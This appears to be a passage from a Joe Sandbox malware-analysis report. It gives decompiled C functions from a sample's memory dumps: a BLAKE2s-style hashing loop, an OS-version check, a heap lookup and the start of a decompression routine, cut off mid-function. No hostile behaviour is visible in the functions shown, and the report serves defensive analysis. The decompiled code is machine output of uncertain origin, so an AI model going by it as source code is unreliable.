Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 707f8965b02cf35f133473575c3ac36cec6f6198f28f14c09ed058821e8e1435
Instruction ID: d1272769abadac1c40df91545b1caeb78ceb119983a7eabfee16fb59845f2c08
Opcode Fuzzy Hash: 707f8965b02cf35f133473575c3ac36cec6f6198f28f14c09ed058821e8e1435
Instruction Fuzzy Hash: FAB1833161060ADFDB15CF28C48AB947BE0FF45368F268699E89ADF2E1C335D981CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00E63FFE Relevance: 1.6, Strings: 1, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00E63FFE() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0xe93680; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0xe93681; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0xe93682; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0xe93683; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0xe93684; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0xe93685; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0xe93686; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0xe93687; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0xe93688; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0xe93689; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0xe9368a; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0xe9368b; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0xe9368c; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0xe9368d; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0xe9368e; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0xe9368f; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

0x00e64004
0x00e6401e
0x00e64026
0x00e6402e
0x00e6402e
0x00e6403a
0x00e6403d
0x00e6403d
0x00e64049
0x00e6404f
0x00e64055
0x00e6405b
0x00e6405f
0x00e64068
0x00e64071
0x00e64077
0x00e64080
0x00e6408a
0x00e64092
0x00e6409a
0x00e640a2
0x00e640aa
0x00e640b2
0x00e640b6
0x00e640ba
0x00e640be
0x00e640c2
0x00e640c6
0x00e640ce
0x00e640d2
0x00e640d6
0x00e640d6
0x00e640ea
0x00e640f0
0x00e640f4
0x00e640fa
0x00e640fd
0x00e640ff
0x00e64101
0x00e64105
0x00e64109
0x00e6410c
0x00e64110
0x00e64124
0x00e6412a
0x00e6412e
0x00e64134
0x00e64137
0x00e6413b
0x00e6413f
0x00e64142
0x00e6414e
0x00e64160
0x00e64166
0x00e6416a
0x00e64170
0x00e64173
0x00e64175
0x00e64177
0x00e6417b
0x00e6417f
0x00e64182
0x00e64186
0x00e6419a
0x00e641a0
0x00e641a4
0x00e641aa
0x00e641ad
0x00e641b1
0x00e641b5
0x00e641b8
0x00e641c0
0x00e641d4
0x00e641dc
0x00e641e2
0x00e641e5
0x00e641e7
0x00e641e9
0x00e641ed
0x00e641f1
0x00e641f4
0x00e64204
0x00e6420a
0x00e6420e
0x00e64214
0x00e64217
0x00e6421b
0x00e6421f
0x00e64222
0x00e64226
0x00e6422a
0x00e6423c
0x00e64242
0x00e64246
0x00e6424c
0x00e6424f
0x00e64251
0x00e64253
0x00e64257
0x00e64262
0x00e6426e
0x00e64274
0x00e64278
0x00e6427e
0x00e64281
0x00e64285
0x00e64289
0x00e6428c
0x00e64290
0x00e64294
0x00e642a6
0x00e642ac
0x00e642b0
0x00e642b6
0x00e642b9
0x00e642bb
0x00e642bd
0x00e642c1
0x00e642cc
0x00e642d8
0x00e642de
0x00e642e2
0x00e642e6
0x00e642ec
0x00e642ef
0x00e642f1
0x00e642f3
0x00e642f7
0x00e642fb
0x00e642ff
0x00e64302
0x00e64306
0x00e6430a
0x00e64311
0x00e6431e
0x00e64320
0x00e64324
0x00e6432e
0x00e64331
0x00e64333
0x00e64335
0x00e64339
0x00e6433d
0x00e64340
0x00e64350
0x00e64356
0x00e6435a
0x00e6435e
0x00e64364
0x00e64367
0x00e64369
0x00e6436b
0x00e6436f
0x00e64373
0x00e64377
0x00e6437a
0x00e6437e
0x00e64382
0x00e64389
0x00e64396
0x00e6439c
0x00e643a0
0x00e643a6
0x00e643a9
0x00e643ab
0x00e643ad
0x00e643b1
0x00e643b5
0x00e643b8
0x00e643c8
0x00e643ce
0x00e643d2
0x00e643d6
0x00e643dc
0x00e643df
0x00e643e1
0x00e643e3
0x00e643e7
0x00e643ea
0x00e643ee
0x00e643f2
0x00e643f6
0x00e643fa
0x00e6440c
0x00e64412
0x00e64416
0x00e6441c
0x00e6441f
0x00e64421
0x00e64423
0x00e64427
0x00e64432
0x00e6443e
0x00e64440
0x00e64444
0x00e64448
0x00e6444a
0x00e64451
0x00e64453
0x00e64455
0x00e64459
0x00e64461
0x00e64464
0x00e64467
0x00e6446b
0x00e6446f
0x00e64473
0x00e64477
0x00e6447b
0x00e64486
0x00e6448d
0x00e64494
0x00e6449b
0x00e6449f
0x00e644a3
0x00e644aa
0x00e644aa
0x00e644b7
0x00e644bb
0x00e644be
0x00e644c1
0x00e644d0

Strings

gj, xrefs: 00E64041

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 7bf31bc9ccc1481114faaeea06e2aaf582f7c8e987d23401e8c0b4e9b5425cb6
Instruction ID: b326b5f6faa9beae780c40ad7855c747d4e7e55867618c54e1319791e727898e
Opcode Fuzzy Hash: 7bf31bc9ccc1481114faaeea06e2aaf582f7c8e987d23401e8c0b4e9b5425cb6
Instruction Fuzzy Hash: A0F1C3B1A083418FD748CF29D880A5AFBE1BFCC208F15892EF598D7711E634E9598B56

Uniqueness

Uniqueness Score: -1.00%

Function 00E6AEE5 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E6AEE5() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xe9e020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xea0f60; // 0xa
					_t13 =  *0xea0f64; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xe9e020 = _t12;
					 *0xea0f60 = _t6;
					 *0xea0f64 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x00e6aee8
0x00e6aef7
0x00e6af35
0x00e6af3a
0x00e6aef9
0x00e6aeff
0x00e6af0a
0x00e6af10
0x00e6af16
0x00e6af1c
0x00e6af22
0x00e6af28
0x00e6af2d
0x00e6af2d
0x00e6af43
0x00000000
0x00e6af45
0x00000000
0x00e6af48

APIs

GetVersionExW.KERNEL32(?), ref: 00E6AF0A

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: a4e0930e705acbf624ca5eb07929d2250b062a558a025be4c30a4511dc03c3bf
Instruction ID: 0418a150e85684e3b907768b3a559a3b4244383d641c92a01aa4430ea4a98039
Opcode Fuzzy Hash: a4e0930e705acbf624ca5eb07929d2250b062a558a025be4c30a4511dc03c3bf
Instruction Fuzzy Hash: 79F01DB8E0020C8FC728DB19EC416E973A5F759314F2002EADA1973354D370BD488EA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E8BAA0 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E8BAA0() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xec16ec = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00e8baa0
0x00e8baa8
0x00e8bab0

APIs

GetProcessHeap.KERNEL32 ref: 00E8BAA0

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: ab3b0c9fc7429ee33126c8f80d28f6992fefa70c707c2d99953e26709bf47a78
Instruction ID: 982c9606ed482ca1d671e7fa44328224402d069fe0605b7ee79301a778dc3829
Opcode Fuzzy Hash: ab3b0c9fc7429ee33126c8f80d28f6992fefa70c707c2d99953e26709bf47a78
Instruction Fuzzy Hash: 4FA011B02022008F83008F33AA082083AAAAB0228030882AAA008E2030EA2080288F00

Uniqueness

Uniqueness Score: -1.00%

Function 00E75EB8 Relevance: .8, Instructions: 800
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00E75EB8(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E00E74DF4(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E00E73A02(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E00E73FAE(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E00E74A3C(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E00E6A9F3(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
